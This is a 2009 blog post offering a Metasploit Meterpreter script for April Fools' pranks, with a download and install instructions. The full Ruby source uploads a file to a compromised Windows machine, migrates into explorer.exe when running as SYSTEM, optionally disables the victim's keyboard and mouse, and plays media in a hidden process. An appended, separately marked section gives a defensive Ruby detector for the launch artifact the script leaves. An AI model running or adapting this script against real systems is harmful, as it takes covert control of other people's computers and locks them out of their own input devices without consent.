Monday, March 30, 2009

Rickroll Meterpreter Script

In order to be well prepared for April Fools' Day, I decided to put out a rickroll Meterpreter script.

It defaults to looking for rickroll.mp3 in the Metasploit framework root directory, but you can use another file with the -f option. I don't parse out the name, so you will have to copy the file into the Metasploit directory.

You can also use any file format supported by Windows Media Player, so you can have it play a wmv instead (even better). By default the process is hidden, but you can make it visible with the -v option.

New Features!
And just for added fun, throw in -k to disable the keyboard or -m to disable the mouse, or go all in with -e to disable both the mouse and keyboard and save precious keystrokes.

Here is the file:
rickroll.tar

Put it in framework3/meterpreter/scripts

#
# Provided by Tim Medin at timmedin[at]gmail [dot] com
#
# Uploads the rick roll'ing mp3 and then runs it as a hidden process
# You can also upload a different file (like a wmv video) and have it display -v
#
# Known Issues: I don't parse the file name provided by -f so make
#   sure the file is in the framework's root directory
#
# Added disable keyboard and mouse features
#
# *** Thanks for help from dark operator (Carlos Perez) ***
#
def message
        print_status "Rickroll'ing Meterpreter Script"
end
def usage
        print(
        "Windows Rickroll Meterpreter Script\n" +
        "Usage: rickroll [-h] [-k] [-m] [-e] [-v] [-f <filename>]\n" +
        @@exec_opts.usage
        )
end

@@exec_opts = Rex::Parser::Arguments.new(
  "-h"  => [ false,  "Help menu."],
  "-f"  => [ false,  "File to upload"],
  "-k"  => [ false,  "Disable Keyboard"],
  "-m"  => [ false,  "Disable Mouse"],
  "-e"  => [ false,  "Disable Keyboard & Mouse"],
  "-v"  => [ false,  "Visible"]
)

rick = "rickroll.mp3"
mediaplayer = "\"C:\\Program Files\\Windows Media Player\\wmplayer.exe\""
visible = false
keyboard = true
mouse = true

@@exec_opts.parse(args) { |opt, idx, val|
        case opt
                when "-k"
                        keyboard = false
                when "-m"
                        mouse = false
                when "-e"
                        keyboard = false
                        mouse = false
                when "-v"
                        visible = true
                when "-f"
                        rick = val
                when "-h"
                        usage
                        # Kernel#abort would exit the whole console; end only this script
                        raise Rex::Script::Completed
                end
}

session = client

#upload file
print_status("Uploading file #{rick}")
uploadpath = session.fs.file.expand_path("%temp%") + "\\#{rand(100)}.mp3"
client.fs.file.upload_file(uploadpath, rick)
print_status("Uploaded file to #{uploadpath}")

# A SYSTEM session has no interactive desktop, so migrate into the logged-in
# user's explorer.exe before touching the UI or launching the player
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
        go = false
        process2mig = "explorer.exe"
        session.sys.process.get_processes().each do |x|
                if (process2mig.index(x['name'].downcase))
                        print_status("\t#{process2mig} Process found, migrating..")
                        session.core.migrate(x['pid'].to_i)
                        print_status("Migration Successful!!")
                        go = true
                end
        end
else
        go = true
end

if (go)
        if (!mouse)
                print_status("Disabling mouse to extend the pain!")
                session.ui.disable_mouse
        end
        if (!keyboard)
                print_status("Disabling keyboard to extend the pain!")
                session.ui.disable_keyboard
        end
        print_status("Rick rolling!")
        client.sys.process.execute("#{mediaplayer} \"#{uploadpath}\"", nil, {'Hidden' => !visible})
else
        print_status("Need logged in user to execute, cannot find explorer.exe to migrate")
end
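As an added example that is not part of the original post or script, here is a small Ruby detector for the host-side trace the script leaves: wmplayer.exe launched on a one- or two-digit .mp3 in the user's Temp directory (the upload path is always built as %temp%\rand(100).mp3, whatever file was actually sent). The Sysmon-style field names and the sample event records are constructed assumptions.

```ruby
# Added example: flag the process-creation artifact the script above leaves
# (wmplayer.exe launched on %temp%\<0-99>.mp3). Not part of the original
# script; the records below are constructed, Sysmon Event ID 1-like samples
# with assumed field names.
SAMPLE_EVENTS = [
  { 'Image'       => 'C:\\Program Files\\Windows Media Player\\wmplayer.exe',
    'ParentImage' => 'C:\\Windows\\explorer.exe',
    'CommandLine' => '"C:\\Program Files\\Windows Media Player\\wmplayer.exe" ' \
                     '"C:\\Users\\bob\\AppData\\Local\\Temp\\42.mp3"' },
  { 'Image'       => 'C:\\Program Files\\Windows Media Player\\wmplayer.exe',
    'ParentImage' => 'C:\\Windows\\explorer.exe',
    'CommandLine' => '"C:\\Program Files\\Windows Media Player\\wmplayer.exe" ' \
                     '"C:\\Users\\bob\\Music\\track01.mp3"' },
  { 'Image'       => 'C:\\Windows\\System32\\notepad.exe',
    'ParentImage' => 'C:\\Windows\\explorer.exe',
    'CommandLine' => 'notepad.exe C:\\Users\\bob\\AppData\\Local\\Temp\\7.mp3' },
]

# The script names the uploaded file rand(100) + ".mp3" under %temp%,
# regardless of what was uploaded, so the path shape is fixed and short.
TEMP_RANDOM_MP3 = /\\Temp\\\d{1,2}\.mp3"?\s*\z/i

# Last path component of a Windows path, lower-cased.
def basename_win(path)
  path.split('\\').last.to_s.downcase
end

# True when wmplayer.exe is started on a short-numbered .mp3 in Temp.
def suspicious_media_launch?(event)
  return false unless basename_win(event['Image']) == 'wmplayer.exe'
  !!(event['CommandLine'] =~ TEMP_RANDOM_MP3)
end

# Return every record that matches the artifact pattern.
def find_rickroll_artifacts(events)
  events.select { |e| suspicious_media_launch?(e) }
end

if __FILE__ == $PROGRAM_NAME
  find_rickroll_artifacts(SAMPLE_EVENTS).each do |e|
    puts "suspicious: #{e['ParentImage']} -> #{e['CommandLine']}"
  end
end
```

The keyboard and mouse disable calls leave no process record, so the player launch and the Temp file write are the observable events to alert on.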
